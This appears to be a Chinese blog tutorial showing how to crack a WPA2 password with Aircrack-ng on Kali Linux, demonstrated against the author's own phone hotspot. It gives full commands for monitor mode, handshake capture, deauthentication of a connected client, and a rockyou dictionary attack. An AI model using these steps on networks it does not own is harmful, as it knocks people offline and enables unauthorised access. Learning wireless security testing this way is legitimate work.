- 前情提要:
Kali Linux
:Kali 2023.3
VMware Workstation
:VMware Workstation 17 Pro
- 一个支持监听并且免驱动的无线网卡(本篇文章使用:
BL-LW05-5R2
),如果不是免驱的市面上大部分无线网卡都没有 Linux
系统的驱动。
VMware Workstation
编辑 -> 首选项 -> USB
-> 询问要执行的操作/将设备连接到前台虚拟机
VMware Workstation
编辑虚拟机设置 -> 硬件设置上添加USB
控制器 -> USB
兼容性 -> USB 3.1
(淦,就是这里,卡了我好久)
工具介绍
Aircrack-ng
是一个广泛使用的开源无线网络安全工具套件,旨在评估和测试无线网络的安全性。
- 它提供了一系列功能强大的工具,用于破解
WEP
和 WPA/WPA2-PSK
等无线网络的密码,以及进行网络流量分析和攻击。
- 以下是
Aircrack-ng
工具套件的主要组成部分和功能:
Airodump-ng
:这是 Aircrack-ng
套件中的一个重要工具,用于捕获和分析无线网络的数据包。它可以显示周围的无线网络,包括其 BSSID
(基本服务集标识符)、ESSID
(扩展服务集标识符)、加密类型等信息。Airodump-ng
还能够捕获数据包并保存到文件中,以供后续分析和破解密码使用。
Aircrack-ng
:这是 Aircrack-ng
工具套件的核心工具,用于破解无线网络的密码。它可以通过对捕获的数据包进行分析和破解,尝试恢复 WEP
密钥或 WPA/WPA2-PSK
的预共享密钥。Aircrack-ng
利用字典攻击和暴力破解等技术,对密码进行穷举破解,从而获取无线网络的访问权限。
Airmon-ng
:这个工具用于在无线网卡上启用监视模式(monitor mode
),以便进行数据包捕获和网络流量分析。监视模式允许用户查看经过无线网络的所有数据包,包括传输的敏感信息。Airmon-ng
还提供了其他有用的功能,如查看和控制无线接口的状态、停止运行中的进程等。
Aireplay-ng
:这个工具用于生成和注入特定类型的数据包,以进行网络攻击和欺骗。它可以通过发送伪造的身份验证请求、重新关联无线客户端或进行数据包注入等方式,干扰和破坏无线网络的正常运行。Aireplay-ng
在破解无线网络密码时起到辅助的作用,增加密码破解的成功率。
Airbase-ng
:这是一个虚拟无线接入点(AP
)工具,用于创建伪造的无线网络。它可以模拟一个无线接入点,吸引无线客户端连接并传输数据。Airbase-ng
在安全评估和渗透测试中非常有用,用于测试无线客户端的安全性和行为。
注:Kali Linux 上已内置 Aircrack-ng。
工具使用
连接网卡
- 插入无线网卡到物理机上,在
VMware Workstation
虚拟机 -> 可移动设备 -> 点击网卡并连接:
- 在
Kali
中查看网卡配置,出现一张 wlan0
的网卡信息:
开启监听
1 2
| root at kali in ~/Desktop $ airmon-ng check kill
|
1 2
| root at kali in ~/Desktop $ airmon-ng
|
1 2
| root at kali in ~/Desktop $ airmon-ng start wlan0
|
1 2
| root at kali in ~/Desktop $ iwconfig
|
注:
- 若大家根据网上的教程来做,这里网卡名称会变成
wlan0mon
。
- 但这里还是
wlan0
,使用 iwconfig
还是可以看见模式变成了 Monitor
,所以没什么关系。
抓取握手包
注:这里使用手机热点演示。
1 2
| root at kali in ~/Desktop $ airodump-ng wlan0
|
- 发现 WIFI:
11nxx的iPhone
,将其内容记录下来。
1 2
| BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 1A:BB:B8:16:84:9E -35 1 0 0 6 130 WPA2 CCMP PSK 11nxx的iPhone
|
注:要复制的话需要 Ctrl+C 停止再复制,因为数据是实时刷新的。
1 2 3 4
| airodump-ng -c 信道值 --bssid BSSID -w hach wlan0 -c 指定 WIFI 信道,就是上图的 CH 值 --bssid 指定 WIFI BSSID,也就是 MAC 地址 -w 指定抓包文件的存放路径
|
1 2 3
| root at kali in ~/Desktop $ airodump-ng -c 6 --bssid 1A:BB:B8:16:84:9E -w 11nxx wlan0 00:18:39 Created capture file "11nxx-01.cap".
|
- 此时发现该
WIFI
下有一个用户在连接,但这样是抓不到无线协议的握手包。因为已经连上了该 WIFI
,所以是没有握手包产生。
1 2
| BSSID STATION PWR Rate Lost Frames Notes Probes 1A:BB:B8:16:84:9E 92:D3:A3:E3:CC:97 -18 1e-24 0 685 EAPOL
|
强制下线
- 既然没有握手包产生,那就把现有用户踢下线,让它重连进而出现握手包:
注:原先抓取握手包的监听不要关闭,新开一个终端。
1 2 3 4
| aireplay-ng -0 2 -a BSSID -c STATION wlan0 -0 对客户端表示发起攻击的次数,默认为1 -a 指定 WIFI BSSID,也就是 MAC 地址 -c 指定用户的 MAC 地址,也就是上图的 STATION
|
1 2
| root at kali in ~ $ aireplay-ng -0 2 -a 1A:BB:B8:16:84:9E -c 92:D3:A3:E3:CC:97 wlan0
|
- 经过攻击后,对方下线重连抓到了握手包,也就是这里出现
WPA handshake
即可。
暴力破解
- 发现
11nxx-01.cap
文件,可以使用 Wireshark
打开,发现是无线协议数据包:
1 2 3 4
| aircrack-ng -a2 -b BSSID -w wordlist xxx.cap -a2 指定攻击模式(1:WEP,2:WPA-PSK) -b 指定 WIFI BSSID,也就是 MAC 地址 -w 指定爆破字典文件
|
1 2
| root at kali in ~/Desktop $ aircrack-ng -a2 -b 1A:BB:B8:16:84:9E -w /usr/share/wordlists/rockyou.txt 11nxx-01.cap
|
关闭监听
- 在监听模式下,
Kali Linux
是无法连接网络的:
1 2
| root at kali in ~/Desktop $ airmon-ng stop wlan0
|
1 2
| root at kali in ~ $ systemctl status NetworkManager
|
- 如果还是没网络,重启一下
Kali Linux
即可。